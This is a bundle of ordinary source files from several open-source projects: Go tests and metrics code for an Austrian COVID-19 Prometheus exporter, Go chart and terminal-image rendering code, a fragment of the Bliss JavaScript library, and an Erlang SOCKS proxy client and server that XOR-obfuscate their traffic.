func TestGeschlechtsVerteilung(t *testing.T) {
result, _ := e.getGeschlechtsVerteilung()
assert.Equal(t, 2, len(result))
assert.Equal(t, int64(100), int64(result[0].Value+result[1].Value))
}
func TestSimpleData(t *testing.T) {
result, err := e.getSimpleData()
assert.Equal(t, 0, len(err))
assert.NotNil(t, result.findMetric("cov19_confirmed", ""))
assert.NotNil(t, result.findMetric("cov19_hospitalized", ""))
assert.NotNil(t, result.findMetric("cov19_intensive_care", ""))
}
func TestHealthMinistryHealth(t *testing.T) {
errors := e.Health()
assert.Equal(t, 0, len(errors))
}
func TestHealthMinistryGetMetrics(t *testing.T) {
result, err := e.GetMetrics()
assert.Nil(t, err, err)
assert.NotNil(t, result)
}
<|start_filename|>metadata_test.go<|end_filename|>
package main
import (
"testing"
"github.com/stretchr/testify/assert"
)
var p = newMetadataProvider()
func TestAustriaLocations(t *testing.T) {
assert.NotNil(t, p.getLocation("Wien"))
assert.NotNil(t, p.getLocation("Kärnten"))
assert.NotNil(t, p.getLocation("Steiermark"))
assert.NotNil(t, p.getLocation("Burgenland"))
assert.NotNil(t, p.getLocation("Niederösterreich"))
assert.NotNil(t, p.getLocation("Oberösterreich"))
assert.NotNil(t, p.getLocation("Salzburg"))
assert.NotNil(t, p.getLocation("Tirol"))
assert.NotNil(t, p.getLocation("Vorarlberg"))
}
func TestLocationsForMetrics(t *testing.T) {
metrics, err := newEcdcExporter(p).GetMetrics()
assert.Nil(t, err)
for _, m := range metrics {
country := (*m.Tags)["country"]
assert.NotNil(t, p.getLocation(country), "Country lookup: "+country)
}
}
func TestLocationsPopulationForMetrics(t *testing.T) {
metrics, err := newEcdcExporter(p).GetMetrics()
assert.Nil(t, err)
for _, m := range metrics {
country := (*m.Tags)["country"]
assert.True(t, p.getPopulation(country) > 0, "Population lookup: "+country)
}
}
func TestMetadataForBezirke(t *testing.T) {
healthMinistryExporter := newHealthMinistryExporter()
metrics, err := healthMinistryExporter.getBezirke()
assert.Nil(t, err)
for _, m := range metrics {
bezirk := (*m.Tags)["bezirk"]
assert.True(t, healthMinistryExporter.mp.getPopulation(bezirk) > 0, "Population lookup: "+bezirk)
assert.True(t, healthMinistryExporter.mp.getLocation(bezirk) != nil, "location lookup: "+bezirk)
}
}
func TestUnknownLocation(t *testing.T) {
assert.Nil(t, p.getLocation("xxxxx"))
assert.Equal(t, uint64(0), p.getPopulation("xxxxx"))
assert.Nil(t, p.getMetadata("xxxxx"))
assert.Nil(t, newMetadataProviderWithFilename("someinvalidfile"))
}
<|start_filename|>ecdc_test.go<|end_filename|>
package main
import (
"testing"
"github.com/stretchr/testify/assert"
)
func TestNormalizeName(t *testing.T) {
assert.Equal(t, "Saudi Arabia", normalizeCountryName("Saudi_Arabia"))
assert.Equal(t, "Canada", normalizeCountryName("CANADA"))
assert.Equal(t, "United States of America", normalizeCountryName("United_States_of_America"))
assert.Equal(t, "Antigua and Barbuda", normalizeCountryName("Antigua_and_Barbuda"))
}
func TestEcdcStats(t *testing.T) {
ecdc := newEcdcExporter(newMetadataProvider())
result, err := ecdc.GetMetrics()
assert.Nil(t, err)
assert.True(t, len(result) > 0)
china := result.findMetric("cov19_world_death", "country=China")
assert.NotNil(t, china)
assert.Equal(t, (*china.Tags)["continent"], "Asia")
assert.Equal(t, (*china.Tags)["latitude"], "35.861660")
assert.Equal(t, (*china.Tags)["longitude"], "104.195397")
assert.True(t, china.Value > 3000)
china = result.findMetric("cov19_world_infected", "country=China")
assert.NotNil(t, china)
assert.Equal(t, (*china.Tags)["continent"], "Asia")
assert.Equal(t, (*china.Tags)["latitude"], "35.861660")
assert.Equal(t, (*china.Tags)["longitude"], "104.195397")
assert.True(t, china.Value > 10000)
bosnia := result.findMetric("cov19_world_infected", "country=Bosnia and Herzegovina")
assert.NotNil(t, bosnia)
assert.Equal(t, (*bosnia.Tags)["continent"], "Europe")
assert.Equal(t, (*bosnia.Tags)["latitude"], "43.915886")
assert.Equal(t, (*bosnia.Tags)["longitude"], "17.679076")
assert.True(t, bosnia.Value > 10)
}
<|start_filename|>prometheus.go<|end_filename|>
package main
import (
"fmt"
"io"
"strings"
)
type metrics []metric
type metric struct {
Name string
Tags *map[string]string
Value float64
}
type CovidStat struct {
location string
infected uint64
deaths uint64
}
type Exporter interface {
GetMetrics() (metrics, error)
Health() []error
}
func writeMetrics(metrics metrics, w io.Writer) error {
for _, m := range metrics {
_, err := io.WriteString(w, formatMetric(m))
if err != nil {
return err
}
}
return nil
}
func formatMetric(m metric) string {
tags := []string{}
if m.Tags != nil {
for k, v := range *m.Tags {
tags = append(tags, k+`="`+v+`"`)
}
return fmt.Sprintf("%s{%s} %f\n", m.Name, strings.Join(tags, ","), m.Value)
}
return fmt.Sprintf("%s %f\n", m.Name, m.Value)
}
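// Illustrative example: a metric with Name "cov19_confirmed", a single tag
// country="Austria" and Value 1234 is rendered in Prometheus exposition format as
//   cov19_confirmed{country="Austria"} 1234.000000
// while a metric with nil Tags is rendered as a bare "name value" line.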
func (metrics metrics) findMetric(metricName string, tagMatch string) *metric {
for _, m := range metrics {
if m.Name == metricName && tagMatch == "" {
return &m
} else if m.Name == metricName {
for k, v := range *m.Tags {
if fmt.Sprintf("%s=%s", k, v) == tagMatch {
return &m
}
}
}
}
return nil
}
func (metrics metrics) checkMetric(metricName, tagMatch string, checkFunction func(x float64) bool) error {
metric := metrics.findMetric(metricName, tagMatch)
if metric == nil {
return fmt.Errorf("Could not find metric %s / (%s)", metricName, tagMatch)
}
if !checkFunction((*metric).Value) {
return fmt.Errorf("Check metric for metric %s / (%s) failed with value: %f", metricName, tagMatch, (*metric).Value)
}
return nil
}
<|start_filename|>main_test.go<|end_filename|>
package main
import (
"io/ioutil"
"net/http"
"net/http/httptest"
"strings"
"testing"
"github.com/stretchr/testify/assert"
)
func TestHealth(t *testing.T) {
ts := httptest.NewServer(http.HandlerFunc(handleHealth))
defer ts.Close()
response, err := ts.Client().Get(ts.URL)
assert.Nil(t, err)
assert.Equal(t, 200, response.StatusCode)
greeting, err := ioutil.ReadAll(response.Body)
assert.Nil(t, err)
assert.Equal(t, "<html><body><img width=\"500\" src=\"https://spiessknafl.at/helth.png\"/></body></html>", string(greeting))
}
func emptyPage(w http.ResponseWriter, r *http.Request) {
w.Write([]byte("<html></html>"))
}
func TestErrors(t *testing.T) {
healthMinistryExporter := exporters[0].(*healthMinistryExporter)
ecdcExporter := exporters[1].(*ecdcExporter)
ecdcURL := ecdcExporter.Url
healthMinistryURL := healthMinistryExporter.url
mockServer := httptest.NewServer(http.HandlerFunc(emptyPage))
defer mockServer.Close()
ecdcExporter.Url = mockServer.URL
healthMinistryExporter.url = mockServer.URL
ts := httptest.NewServer(http.HandlerFunc(handleHealth))
defer ts.Close()
response, err := ts.Client().Get(ts.URL)
assert.Nil(t, err)
assert.Equal(t, 500, response.StatusCode)
greeting, err := ioutil.ReadAll(response.Body)
assert.Nil(t, err)
assert.Equal(t, `<html><body><img width="500" src="https://spiessknafl.at/fine.jpg"/><pre>Could not find beginning of array
Not enough Bezirke Results: 0
Could not find beginning of array
Missing Bundesland result 0
Could not find beginning of array
Missing age metrics
Could not find beginning of array
Geschlechtsverteilung failed
Erkrankungen not found in /SimpleData.js
dpGenesen not found in /Genesen.js
dpTotGemeldet not found in /VerstorbenGemeldet.js
dpGesNBBel not found in /GesamtzahlNormalbettenBel.js
dpGesIBBel not found in /GesamtzahlIntensivBettenBel.js
dpGesTestungen not found in /GesamtzahlTestungen.js
Could not find "Bestätigte Fälle"
World stats are failing
</pre></body></html>`, string(greeting))
ecdcExporter.Url = ecdcURL
healthMinistryExporter.url = healthMinistryURL
}
func TestMetrics(t *testing.T) {
ts := httptest.NewServer(http.HandlerFunc(handleMetrics))
defer ts.Close()
response, err := ts.Client().Get(ts.URL)
assert.Nil(t, err)
assert.Equal(t, 200, response.StatusCode)
metricsString, err := ioutil.ReadAll(response.Body)
assert.Nil(t, err)
metricResult := string(metricsString)
assert.True(t, strings.Contains(metricResult, "cov19_tests"))
assert.True(t, strings.Contains(metricResult, "cov19_confirmed"))
assert.True(t, strings.Contains(metricResult, "cov19_healed"))
assert.True(t, strings.Contains(metricResult, "cov19_world_infected"))
assert.True(t, strings.Contains(metricResult, "cov19_world_death"))
assert.True(t, strings.Contains(metricResult, "cov19_detail"))
assert.True(t, strings.Contains(metricResult, "cov19_detail_dead"))
}
| cinemast/covid19-at |
<|start_filename|>graph/graph.go<|end_filename|>
package graph
import (
"fmt"
"math"
humanize "github.com/dustin/go-humanize"
"github.com/rs/jplot/data"
chart "github.com/wcharczuk/go-chart"
"github.com/wcharczuk/go-chart/drawing"
)
func init() {
chart.DefaultBackgroundColor = chart.ColorTransparent
chart.DefaultCanvasColor = chart.ColorTransparent
chart.DefaultTextColor = drawing.Color{R: 180, G: 180, B: 180, A: 255}
chart.DefaultAxisColor = drawing.Color{R: 180, G: 180, B: 180, A: 255}
chart.DefaultAnnotationFillColor = chart.ColorBlack.WithAlpha(200)
}
// New generates a line chart from the spec fields and the collected data points.
func New(spec data.Spec, dp *data.Points, width, height int) chart.Chart {
series := []chart.Series{}
markers := []chart.GridLine{}
for _, f := range spec.Fields {
vals := dp.Get(f.ID)
if f.IsMarker {
for i, v := range vals {
if v > 0 {
markers = append(markers, chart.GridLine{Value: float64(i)})
}
}
continue
}
series = append(series, chart.ContinuousSeries{
Name: fmt.Sprintf("%s: %s", f.Name, siValueFormater(vals[len(vals)-1])),
YValues: vals,
})
}
return newChart(series, markers, width, height)
}
func newChart(series []chart.Series, markers []chart.GridLine, width, height int) chart.Chart {
var min, max float64 = math.MaxFloat64, -math.MaxFloat64
for i, s := range series {
if s, ok := s.(chart.ContinuousSeries); ok {
min, max = minMax(s.YValues, min, max)
s.XValues = chart.LinearRange(0, float64(len(s.YValues)-1))
c := chart.GetAlternateColor(i + 4)
s.Style = chart.Style{
Hidden: false,
StrokeWidth: 2,
StrokeColor: c,
FillColor: c.WithAlpha(20),
FontSize: 9,
}
series[i] = s
last := chart.LastValueAnnotationSeries(s, siValueFormater)
last.Style.FillColor = c
last.Style.FontColor = textColor(c)
last.Style.FontSize = 9
last.Style.Padding = chart.NewBox(2, 2, 2, 2)
series = append(series, last)
}
}
graph := chart.Chart{
Width: width,
Height: height,
Background: chart.Style{
Padding: chart.NewBox(5, 0, 0, 5),
},
YAxis: chart.YAxis{
Style: chart.Shown(),
ValueFormatter: siValueFormater,
},
Series: series,
}
if min == max {
// By default, go-chart will fail to render a flat line as the range will be NaN.
// Define a manual range in such case.
// See https://github.com/wcharczuk/go-chart/issues/31
graph.YAxis.Range = &chart.ContinuousRange{
Min: min - 0.05,
Max: max + 0.05,
}
}
if len(markers) > 0 {
graph.Background.Padding.Bottom = 0 // compensate transparent tick space
graph.XAxis = chart.XAxis{
Style: chart.Shown(),
TickStyle: chart.Style{
StrokeColor: chart.ColorTransparent,
},
TickPosition: 10, // hide text with non-existing position
GridMajorStyle: chart.Style{
Hidden: false,
StrokeColor: chart.ColorAlternateGray.WithAlpha(100),
StrokeWidth: 2.0,
StrokeDashArray: []float64{2.0, 2.0},
},
GridLines: markers,
}
}
graph.Elements = []chart.Renderable{
legend(&graph, chart.Style{
FillColor: drawing.Color{A: 100},
FontColor: chart.ColorWhite,
StrokeColor: chart.ColorTransparent,
}),
}
return graph
}
func minMax(values []float64, curMin, curMax float64) (min, max float64) {
min, max = curMin, curMax
for _, value := range values {
if value < min {
min = value
}
if value > max {
max = value
}
}
return
}
func siValueFormater(v interface{}) string {
value, prefix := humanize.ComputeSI(v.(float64))
value = float64(int(value*100)) / 100
return humanize.Ftoa(value) + " " + prefix
}
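// textColor picks black or white text for the given background color based on its
// relative luminance: the sRGB channels are linearized and weighted with the
// Rec. 709 coefficients, so annotation labels stay readable on both light and
// dark series colors.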
func textColor(bg drawing.Color) drawing.Color {
var L float64
for c, f := range map[uint8]float64{bg.R: 0.2126, bg.G: 0.7152, bg.B: 0.0722} {
c := float64(c) / 255.0
if c <= 0.03928 {
c = c / 12.92
} else {
c = math.Pow(((c + 0.055) / 1.055), 2.4)
}
L += c * f
}
if L > 0.179 {
return chart.ColorBlack
}
return chart.ColorWhite
}
<|start_filename|>term/common.go<|end_filename|>
package term
import (
"errors"
"fmt"
"io"
"os"
"sync"
"time"
"golang.org/x/crypto/ssh/terminal"
)
var ecsi = "\033]"
var st = "\007"
var cellSizeOnce sync.Once
var cellWidth, cellHeight float64
var termWidth, termHeight int
func HasGraphicsSupport() bool {
return os.Getenv("TERM_PROGRAM") == "iTerm.app" || sixelEnabled
}
// ClearScrollback clears iTerm2 scrollback.
func ClearScrollback() {
if !sixelEnabled {
print(ecsi + "1337;ClearScrollback" + st)
}
}
// TermSize contains sizing information of the terminal.
type TermSize struct {
Row int
Col int
Width int
Height int
}
func initCellSize() {
s, err := terminal.MakeRaw(1)
if err != nil {
return
}
defer terminal.Restore(1, s)
if sixelEnabled {
fmt.Fprint(os.Stdout, "\033[14t")
fileSetReadDeadline(os.Stdout, time.Now().Add(time.Second))
defer fileSetReadDeadline(os.Stdout, time.Time{})
fmt.Fscanf(os.Stdout, "\033[4;%d;%dt", &termHeight, &termWidth)
return
}
fmt.Fprint(os.Stdout, ecsi+"1337;ReportCellSize"+st)
fileSetReadDeadline(os.Stdout, time.Now().Add(time.Second))
defer fileSetReadDeadline(os.Stdout, time.Time{})
fmt.Fscanf(os.Stdout, "\033]1337;ReportCellSize=%f;%f\033\\", &cellHeight, &cellWidth)
}
// Size gathers sizing information of the current session's controlling terminal.
func Size() (size TermSize, err error) {
size.Col, size.Row, err = terminal.GetSize(1)
if err != nil {
return
}
cellSizeOnce.Do(initCellSize)
if termWidth > 0 && termHeight > 0 {
size.Width = int(termWidth/(size.Col-1)) * (size.Col - 1)
size.Height = int(termHeight/(size.Row-1)) * (size.Row - 1)
return
}
if cellWidth+cellHeight == 0 {
err = errors.New("cannot get terminal cell size")
return
}
size.Width, size.Height = size.Col*int(cellWidth), size.Row*int(cellHeight)
return
}
// Rows returns the number of rows for the controlling terminal.
func Rows() (rows int, err error) {
_, rows, err = terminal.GetSize(1)
return
}
func NewImageWriter(width, height int) io.WriteCloser {
if sixelEnabled {
return &sixelWriter{
Width: width,
Height: height,
}
}
return &imageWriter{
Width: width,
Height: height,
}
}
<|start_filename|>term/sixel.go<|end_filename|>
package term
import (
"bytes"
"image/png"
"os"
"sync"
"time"
"github.com/mattn/go-isatty"
"github.com/mattn/go-sixel"
"golang.org/x/crypto/ssh/terminal"
)
var sixelEnabled = false
func init() {
if os.Getenv("TERM_PROGRAM") != "iTerm.app" {
sixelEnabled = checkSixel()
}
}
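// checkSixel probes the terminal with a DA1 (primary device attributes) query and
// reports whether the reply both starts with a known sixel-capable terminal prefix
// and advertises attribute "4", which signals sixel graphics support.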
func checkSixel() bool {
if isatty.IsCygwinTerminal(os.Stdout.Fd()) {
return true
}
s, err := terminal.MakeRaw(1)
if err != nil {
return false
}
defer terminal.Restore(1, s)
_, err = os.Stdout.Write([]byte("\x1b[c"))
if err != nil {
return false
}
defer fileSetReadDeadline(os.Stdout, time.Time{})
var b [100]byte
n, err := os.Stdout.Read(b[:])
if err != nil {
return false
}
var supportedTerminals = []string{
"\x1b[?62;", // VT240
"\x1b[?63;", // wsltty
"\x1b[?64;", // mintty
"\x1b[?65;", // RLogin
}
supported := false
for _, supportedTerminal := range supportedTerminals {
if bytes.HasPrefix(b[:n], []byte(supportedTerminal)) {
supported = true
break
}
}
if !supported {
return false
}
for _, t := range bytes.Split(b[6:n], []byte(";")) {
if len(t) == 1 && t[0] == '4' {
return true
}
}
return false
}
type sixelWriter struct {
Name string
Width int
Height int
once sync.Once
enc *sixel.Encoder
buf *bytes.Buffer
}
func (w *sixelWriter) init() {
w.buf = &bytes.Buffer{}
w.enc = sixel.NewEncoder(os.Stdout)
}
// Write writes the PNG image data into the sixelWriter buffer.
func (w *sixelWriter) Write(p []byte) (n int, err error) {
w.once.Do(w.init)
return w.buf.Write(p)
}
// Close flushes the image to the terminal and closes the writer.
func (w *sixelWriter) Close() error {
w.once.Do(w.init)
img, err := png.Decode(w.buf)
if err != nil {
return err
}
return w.enc.Encode(img)
}
<|start_filename|>term/iterm2.go<|end_filename|>
package term
import (
"bytes"
"encoding/base64"
"fmt"
"io"
"os"
"sync"
)
func init() {
if os.Getenv("TERM") == "screen" {
ecsi = "\033Ptmux;\033" + ecsi
st += "\033\\"
}
}
// imageWriter buffers PNG data and, on Close, writes it to the iTerm2 terminal as a base64-encoded inline image.
type imageWriter struct {
Name string
Width int
Height int
once sync.Once
b64enc io.WriteCloser
buf *bytes.Buffer
}
func (w *imageWriter) init() {
w.buf = &bytes.Buffer{}
w.b64enc = base64.NewEncoder(base64.StdEncoding, w.buf)
}
// Write writes the PNG image data into the imageWriter buffer.
func (w *imageWriter) Write(p []byte) (n int, err error) {
w.once.Do(w.init)
return w.b64enc.Write(p)
}
// Close flushes the image to the terminal and closes the writer.
func (w *imageWriter) Close() error {
w.once.Do(w.init)
fmt.Printf("%s1337;File=preserveAspectRatio=1;width=%dpx;height=%dpx;inline=1:%s%s", ecsi, w.Width, w.Height, w.buf.Bytes(), st)
return w.b64enc.Close()
}
| Rutori/jplot |
<|start_filename|>bliss._.js<|end_filename|>
(function($) {
"use strict";
if (!Bliss || Bliss.shy) {
return;
}
var _ = Bliss.property;
// Methods requiring Bliss Full
$.add({
// Clone elements, with events and data
clone: function () {
console.warn("$.clone() is deprecated and will be removed in a future version of Bliss.");
var clone = this.cloneNode(true);
var descendants = $.$("*", clone).concat(clone);
$.$("*", this).concat(this).forEach(function(element, i, arr) {
$.events(descendants[i], element);
descendants[i]._.data = $.extend({}, element._.data);
});
return clone;
}
}, {array: false});
// Define the _ property on arrays and elements
Object.defineProperty(Node.prototype, _, {
// Written for IE compatibility (see #49)
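// The getter removes itself from Node.prototype, defines `_` as an own value
// on the element (so the $.Element wrapper is created lazily, exactly once per
// node), and then restores itself for all other nodes.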
get: function getter () {
Object.defineProperty(Node.prototype, _, {
get: undefined
});
Object.defineProperty(this, _, {
value: new $.Element(this)
});
Object.defineProperty(Node.prototype, _, {
get: getter
});
return this[_];
},
configurable: true
});
Object.defineProperty(Array.prototype, _, {
get: function () {
Object.defineProperty(this, _, {
value: new $.Array(this)
});
return this[_];
},
configurable: true
});
// Hijack addEventListener and removeEventListener to store callbacks
if (self.EventTarget && "addEventListener" in EventTarget.prototype) {
EventTarget.prototype.addEventListener = function(type, callback, options) {
return $.bind(this, type, callback, options);
};
EventTarget.prototype.removeEventListener = function(type, callback, options) {
return $.unbind(this, type, callback, options);
};
}
// Set $ and $$ convenience methods, if not taken
self.$ = self.$ || $;
self.$$ = self.$$ || $.$;
})(Bliss);
| LeaVerou/bliss |
<|start_filename|>apps/proxy_server/src/proxy_server_sup.erl<|end_filename|>
%%%-------------------------------------------------------------------
%%% @author <NAME> <<EMAIL>>
%%% @copyright (C) 2013, <NAME>
%%% @doc
%%%
%%% @end
%%% Created : 8 Apr 2013 by <NAME> <<EMAIL>>
%%%-------------------------------------------------------------------
-module(proxy_server_sup).
-behaviour(supervisor_bridge).
%% API
-export([start_link/0]).
%% supervisor_bridge callbacks
-export([init/1, terminate/2]).
-define(SERVER, ?MODULE).
-record(state, {}).
%%%===================================================================
%%% API
%%%===================================================================
%%--------------------------------------------------------------------
%% @doc
%% Starts the supervisor bridge
%%
%% @spec start_link() -> {ok, Pid} | ignore | {error, Error}
%% @end
%%--------------------------------------------------------------------
start_link() ->
supervisor_bridge:start_link({local, ?SERVER}, ?MODULE, []).
%%%===================================================================
%%% supervisor_bridge callbacks
%%%===================================================================
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Creates a supervisor_bridge process, linked to the calling process,
%% which calls Module:init/1 to start the subsystem. To ensure a
%% synchronized start-up procedure, this function does not return
%% until Module:init/1 has returned.
%%
%% @spec init(Args) -> {ok, Pid, State} |
%% ignore |
%% {error, Reason}
%% @end
%%--------------------------------------------------------------------
init([]) ->
Pid = spawn(proxy_server, start, []),
{ok, Pid, #state{}}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% This function is called by the supervisor_bridge when it is about
%% to terminate. It should be the opposite of Module:init/1 and stop
%% the subsystem and do any necessary cleaning up.The return value is
%% ignored.
%%
%% @spec terminate(Reason, State) -> void()
%% @end
%%--------------------------------------------------------------------
terminate(Reason, _State) ->
proxy_gate ! {stop, self(), Reason},
receive
{ack, stop} ->
ok
after 2000 ->
ok
end.
%%%===================================================================
%%% Internal functions
%%%===================================================================
<|start_filename|>apps/proxy_client/src/proxy_defs.hrl<|end_filename|>
-define(IPV4, 16#01).
-define(IPV6, 16#04).
-define(DOMAIN, 16#03).
-define(OPTIONS,
[binary,
{reuseaddr, true},
{active, false},
{nodelay, true}
]).
-define(OPTIONS(IP), [{ip, IP} | ?OPTIONS]).
-define(GETADDR, fun(IP) -> {ok, Addr} = inet:getaddr(IP, inet), Addr end).
-ifdef(DEBUG).
-define(LOG(Msg, Args), io:format(Msg, Args)).
-define(LOG(Msg), io:format(Msg)).
-else.
-define(LOG(Msg, Args), true).
-define(LOG(Msg), true).
-endif.
<|start_filename|>apps/proxy_server/src/proxy_transform.erl<|end_filename|>
-module(proxy_transform).
-export([transform/1]).
-define(SIGN, 2#01111001).
%% This module obfuscates data before it is sent over the internet by XOR-ing every byte with a fixed sign byte.
transform(Data) ->
transform(Data, ?SIGN, []).
transform(<<>>, _, Res) ->
list_to_binary( lists:reverse(Res) );
transform(<<H:8, T/binary>>, Sign, Res) ->
transform(T, Sign, [H bxor Sign | Res]).
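%% Illustrative shell session (hypothetical values): since bxor with the same
%% sign byte is its own inverse, applying transform/1 twice returns the original
%% payload, which is what the client and server rely on to undo the obfuscation:
%%   1> Payload = <<"hello">>.
%%   2> proxy_transform:transform(proxy_transform:transform(Payload)) =:= Payload.
%%   true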
<|start_filename|>apps/proxy_client/src/proxy_client_worker.erl<|end_filename|>
%%%-------------------------------------------------------------------
%%% @author <NAME> <<EMAIL>>
%%% @copyright (C) 2013, <NAME>
%%% @doc
%%%
%%% @end
%%% Created : 8 Apr 2013 by <NAME> <<EMAIL>>
%%%-------------------------------------------------------------------
-module(proxy_client_worker).
-behaviour(gen_server).
%% API
-export([start_link/1]).
%% gen_server callbacks
-export([init/1, handle_call/3, handle_cast/2, handle_info/2,
terminate/2, code_change/3]).
-define(SERVER, ?MODULE).
-record(state, {server_ip,
server_port,
server_sock,
client_ip,
client_port,
client_sock
}).
-define(SOCK_OPTIONS,
[binary,
{reuseaddr, true},
{active, false},
{nodelay, true}
]).
-include("proxy_defs.hrl").
%%%===================================================================
%%% API
%%%===================================================================
%%--------------------------------------------------------------------
%% @doc
%% Starts the server
%%
%% @spec start_link() -> {ok, Pid} | ignore | {error, Error}
%% @end
%%--------------------------------------------------------------------
% Leave out the {local, Name} registration so that the process
% remains unregistered. This enables us to start
% multiple processes using the pr_sup:start_child() call
start_link(ClientSock) ->
ConfFile = filename:join(code:priv_dir(proxy_client), "client.conf"),
case file:consult(ConfFile) of
{ok, Conf} ->
gen_server:start_link(?MODULE, [{client_sock, ClientSock}|Conf], []);
{error, _Reason} ->
{error, conf_file_error}
end.
%%%===================================================================
%%% gen_server callbacks
%%%===================================================================
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Initializes the server
%%
%% @spec init(Args) -> {ok, State} |
%% {ok, State, Timeout} |
%% ignore |
%% {stop, Reason}
%% @end
%%--------------------------------------------------------------------
init(Conf) ->
ServerIP = proplists:get_value(server_ip, Conf),
ServerPort = proplists:get_value(server_port, Conf),
ClientIP = proplists:get_value(listen_ip, Conf),
ClientPort = proplists:get_value(listen_port, Conf),
Client = proplists:get_value(client_sock, Conf),
case gen_tcp:connect(getaddr_or_fail(ServerIP), ServerPort, ?SOCK_OPTIONS) of
{ok, RemoteSocket} ->
ok = inet:setopts(RemoteSocket, [{active, true}]),
{ok, #state{server_ip=ServerIP,
server_port=ServerPort,
server_sock=RemoteSocket,
client_ip=ClientIP,
client_port=ClientPort,
client_sock=Client}, 0};
%%communicate(Client, RemoteSocket);
{error, Error} ->
?LOG("Connect error, ~p. ~p:~p~n", [Error, ServerIP, ServerPort]),
gen_tcp:close(Client),
{stop, server_connect_fail}
end.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling call messages
%%
%% @spec handle_call(Request, From, State) ->
%% {reply, Reply, State} |
%% {reply, Reply, State, Timeout} |
%% {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, Reply, State} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_call(_Request, _From, State) ->
Reply = ok,
{reply, Reply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling cast messages
%%
%% @spec handle_cast(Msg, State) -> {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_cast(_Msg, State) ->
{noreply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling all non call/cast messages
%%
%% @spec handle_info(Info, State) -> {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_info(timeout, #state{server_sock=RemoteSocket, client_sock=Client, client_ip=LocalIP, client_port=LocalPort} = State) ->
% try
case find_target(Client) of
{ok, Mod, {connect, Addr}} ->
Target = encode_addr(Addr),
ok = gen_tcp:send(RemoteSocket, proxy_transform:transform(Target)),
ok = inet:setopts(Client, [{active, true}]),
IP = list_to_binary(tuple_to_list(getaddr_or_fail(LocalIP))),
ok = gen_tcp:send(Client, Mod:unparse_connection_response({granted, {ipv4, IP, LocalPort}})),
{noreply, State};
{error, client_closed} ->
{stop, normal, State};
{error, Reason} ->
?LOG("client communication init error: ~p~n", [Reason]),
{stop, Reason, State}
%% end
%% catch
%% error:{badmatch,_} ->
%% {stop, normal, State};
%% _Error:_Reason ->
%% ?LOG("client recv error, ~p: ~p~n", [_Error, _Reason]),
%% {stop, normal, State}
end;
handle_info({tcp, Client, Request}, #state{server_sock=RemoteSocket, client_sock=Client} = State) ->
case gen_tcp:send(RemoteSocket, proxy_transform:transform(Request)) of
ok ->
{noreply, State};
{error, _Error} ->
{stop, _Error, State}
end;
handle_info({tcp, RemoteSocket, Response}, #state{server_sock=RemoteSocket, client_sock=Client} = State) ->
case gen_tcp:send(Client, proxy_transform:transform(Response)) of
ok ->
{noreply, State};
{error, _Error} ->
{stop, _Error, State}
end;
handle_info({tcp_closed, ASocket}, #state{server_sock=RemoteSocket, client_sock=Client} = State) ->
case ASocket of
Client ->
{stop, normal, State};
RemoteSocket ->
{stop, normal, State}
end;
handle_info({tcp_error, ASocket, _Reason}, #state{server_sock=RemoteSocket, client_sock=Client} = State) ->
case ASocket of
Client ->
?LOG("~p client tcp error~n", [ASocket]),
{stop, _Reason, State};
RemoteSocket ->
?LOG("~p server tcp error~n", [ASocket]),
{stop, _Reason, State}
end;
handle_info(_Info, State) ->
{noreply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% This function is called by a gen_server when it is about to
%% terminate. It should be the opposite of Module:init/1 and do any
%% necessary cleaning up. When it returns, the gen_server terminates
%% with Reason. The return value is ignored.
%%
%% @spec terminate(Reason, State) -> void()
%% @end
%%--------------------------------------------------------------------
terminate(_Reason, #state{server_sock=RemoteSocket, client_sock=Client}) ->
gen_tcp:close(RemoteSocket),
gen_tcp:close(Client),
ok;
terminate(_Reason, _State) ->
ok.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Convert process state when code is changed
%%
%% @spec code_change(OldVsn, State, Extra) -> {ok, NewState}
%% @end
%%--------------------------------------------------------------------
code_change(_OldVsn, State, _Extra) ->
{ok, State}.
%%%===================================================================
%%% Internal functions
%%%===================================================================
getaddr_or_fail(IP) ->
{ok, Addr} = inet:getaddr(IP, inet),
Addr.
find_target(Client) ->
%% 0x05:version
case gen_tcp:recv(Client, 0) of
{ok, <<Version:8, _/binary>> = Greeting} ->
socks_proxy_handshake(Client, Version, Greeting);
{error, closed} ->
{error, client_closed};
{error, Reason} ->
{error, Reason}
end.
socks_proxy_handshake(Client, Version, Greeting) ->
case Version of
%% SOCKS4
16#04 ->
case proxy_proto_socks4:parse_greeting_request(Greeting) of
{connect, _UserId, Addr} ->
{ok, proxy_proto_socks4, {connect, Addr}};
{error, Reason} ->
{error, Reason}
end;
16#05 ->
{auth_methods, _} = proxy_proto_socks5:parse_greeting_request(Greeting),
gen_tcp:send(Client, proxy_proto_socks5:unparse_greeting_response(no_auth)),
{ok, ConnReq} = gen_tcp:recv(Client, 0),
case proxy_proto_socks5:parse_connection_request(ConnReq) of
{connect, Addr} ->
{ok, proxy_proto_socks5, {connect, Addr}};
{error, Reason} ->
{error, Reason}
end
end.
encode_addr({ipv4, Address, Port}) ->
<<?IPV4, Port:16, Address:32>>;
encode_addr({ipv6, Address, Port}) ->
<<?IPV6, Port:16, Address:128>>;
encode_addr({domain, DomainBin, Port}) ->
<<?DOMAIN, Port:16, (byte_size(DomainBin)):8, DomainBin/binary>>;
encode_addr(_) ->
error.
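%% Wire format produced by encode_addr/1 (and read back by the server's
%% parse_address/2): a one-byte address type (?IPV4 | ?IPV6 | ?DOMAIN),
%% a 16-bit port, then the address itself -- 4 bytes for IPv4, 16 bytes for
%% IPv6, or a one-byte length followed by the domain name. The whole header
%% is passed through proxy_transform:transform/1 before being sent.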
<|start_filename|>apps/proxy_server/src/utils.hrl<|end_filename|>
-define(IPV4, 16#01).
-define(IPV6, 16#04).
-define(DOMAIN, 16#03).
-define(GETADDR, fun(IP) -> {ok, Addr} = inet:getaddr(IP, inet), Addr end).
